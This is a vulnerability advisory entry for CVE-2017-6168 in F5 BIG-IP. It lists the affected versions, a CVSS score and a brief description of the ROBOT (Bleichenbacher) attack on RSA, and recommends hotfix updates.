PT-2017-16927 · F5 · Big-Ip
Published
2017-11-17
·
Updated
2021-09-23
·
CVE-2017-6168
CVSS v3.1
7.4
High
| Vector | AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N |
Name of the Vulnerable Software and Affected Versions
BIG-IP versions 11.6.0 through 11.6.2
BIG-IP versions 12.0.0 through 12.1.2 HF1
BIG-IP versions 13.0.0 through 13.0.0 HF2
Description
The issue allows for an Adaptive Chosen Ciphertext attack, also known as a Bleichenbacher attack, against RSA. This can result in plaintext recovery of encrypted messages and/or a Man-in-the-middle (MiTM) attack, without the attacker needing access to the server's private key. This type of attack is referred to as a ROBOT attack.
Recommendations
For BIG-IP versions 11.6.0 through 11.6.2, update to 11.6.2 HF1.
For BIG-IP versions 12.0.0 through 12.1.2 HF1, update to 12.1.2 HF2.
For BIG-IP versions 13.0.0 through 13.0.0 HF2, update to 13.0.0 HF3.
Exploit
Fix
Side Channel Attack
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Big-Ip